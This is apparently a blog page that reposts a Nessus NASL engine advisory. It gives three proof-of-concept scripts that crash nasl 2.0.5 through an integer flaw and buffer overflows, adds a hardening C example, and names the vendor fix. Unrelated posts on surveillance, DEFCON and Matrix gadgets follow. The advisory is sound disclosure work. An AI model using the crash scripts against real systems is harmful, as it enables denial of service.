Heads Up, Nessus Exploits.
There exist some vulnerabilities in the NASL scripting engine.
To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins to the
Nessus server (this option is disabled by default), or he/she would need to
trick a user somehow into running a specially crafted NASL script.

Note that these issues can NOT be exploited by a tested host to crash
nessusd remotely.

* ISSUE 1 - Integer handling vulnerability in insstr() function

The vulnerability is triggered by a negative fourth argument:

$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);

$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)

* ISSUE 2 - Buffer overflow in scanner_add_port() function

The overflow is triggered by a very long 'proto' argument:

$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));

$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)

* ISSUE 3 - Buffer overflow in ftp_log_in() function

The overflow is triggered by very long 'user'/'pass' arguments:

$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));

$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
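All three issues come down to the same defect: the engine trusts a script-supplied integer or string length before using it on memory. The C below is an added illustration written for this page, not code from Nessus or from the advisory, of the two checks that close that class of bug: a replacement-style insert that validates signed indices (a NASL value such as 0xfffffffd arrives as -3, which is the case the insstr() warning above reports) before any copy, and a bounded copy for a fixed-size field such as a protocol name that fails instead of overflowing. The function names safe_insstr and copy_bounded are hypothetical, and the inclusive i1..i2 range semantics are an assumption about how insstr() is meant to behave.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical hardened insstr(): replaces str[i1..i2] (inclusive) with ins
 * and returns a newly allocated string, or NULL if the indices are rejected.
 * Indices are signed on purpose: a script can pass 0xfffffffd, which is -3. */
char *safe_insstr(const char *str, const char *ins, long i1, long i2) {
    size_t len = strlen(str), ilen = strlen(ins);

    /* Reject negative indices, reversed ranges and ends past the string
     * before touching any memory. This is the check the crash above lacks. */
    if (i1 < 0 || i2 < 0 || i1 > i2 || (size_t)i2 >= len)
        return NULL;

    size_t head = (size_t)i1;            /* bytes kept before the range */
    size_t tail = len - (size_t)i2 - 1;  /* bytes kept after the range  */

    /* Guard the size arithmetic itself against wrapping. */
    if (ilen > SIZE_MAX - head - tail - 1)
        return NULL;

    char *out = malloc(head + ilen + tail + 1);
    if (!out)
        return NULL;
    memcpy(out, str, head);
    memcpy(out + head, ins, ilen);
    memcpy(out + head + ilen, str + (size_t)i2 + 1, tail);
    out[head + ilen + tail] = '\0';
    return out;
}

/* Hypothetical bounded copy for a fixed-size field (e.g. a 'proto' name):
 * returns 0 on success, -1 if src would not fit including its terminator. */
int copy_bounded(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;                       /* refuse rather than overflow */
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void) {
    /* The advisory's t1.nasl arguments: index 3 and 0xfffffffd (-3). */
    char *r = safe_insstr("aaaaaaaaaaa", "bb", 3, -3);
    printf("negative index: %s\n", r ? r : "rejected");

    r = safe_insstr("abcdef", "XY", 1, 3);
    printf("valid range: %s\n", r ? r : "rejected");
    free(r);

    /* Constructed 300-byte 'proto' value, as in t2.nasl's crap(length:300). */
    char proto[300];
    memset(proto, 'A', sizeof proto - 1);
    proto[sizeof proto - 1] = '\0';
    char field[16];
    printf("long proto: %s\n", copy_bounded(field, sizeof field, proto) == 0
                                   ? "copied" : "rejected");
    return 0;
}
```

The point is that validation happens on the signed values as the script supplied them, before any cast to an unsigned size, so a negative index can never turn into a huge offset further down.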

III. VERSIONS TESTED

Linux RedHat 7.2

$ nasl -v | grep nasl
nasl 2.0.5

IV. VENDOR STATUS

The new nessus 2.0.6 packages fix these issues.

V. WORKAROUND

Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf and
don't run untrusted NASL scripts.

VI. CREDITS

Hank Leininger requested the source code audit
for some opensource projects and for nessus in particular.

Sir Mordred discovered the issues.

Renaud Deraison fixed them within an hour of being
notified.


Is the government going too far?
I was reading on The Register, an article from Kevin Poulsen regarding the newest search and surveillance issues. It is really frightening that more people in the IS are not frightened about this. Seeing that they call computer hackers terrorists alarms me. I don't think my skill for stealing streaming media or hacking a TiVo somehow ties me into the same groups as a rack thrower who likes to crash planes. It is embarrassing. Read the article here and get the word out.


So it's only 71 days till DEFCON.
The DEFCON Cannonball Run is ready to go. Moloch will have a new T-shirt along with other T-shirts available. We should also have buttons and other merchandise. I am going to be looking at lights and equipment for another DEFCON Moloch Party, more moloch party pics here, sorry again for skipping last year. If I speak I will have some stuff to throw out to the audience this year too. If you can't make it to DEFCON, start looking at TOORCON, a great convention in San Diego, CA. I am sure I will prepare something for that.


Ok, I am still a little stuck on Matrix stories but here's the new phone.
The phone is made by Samsung and is the same one that they say is used in the movie. You can check out the story on CNET or you can be lazy like me and just watch the video. The phone makes sounds and plays short animated scenes but not much more than that. The phones have a serial number because they are collectable but so does everything else in the world. Everything has a serial. Maybe my blender is a collectors item too. The tommEE pickles Blender on sale soon. Check out the video clip here.


I guess this is for the kazaa handicapped.
After the fall of movies.com and intertainment.com, only two servers are left standing in the downloadable-movie business: movielink.com and cinemanow.com. (A third, starzondemand.com, is in the works.) Each charges about $4 or $5 to watch a recent movie, roughly the same amount the video store does. If you don't leech, I guess this is your penalty, but DVDs are like $20 and less. It is legal to trade also.


Latest Matrix Screensaver but it's only for OSX
I am so sick of seeing the damn Matrix screensavers but this screensaver does reproduce the Matrix screen effect well. Unfortunately it is OSX-only. Go get it here and if you find one for X86 that is better, email me.
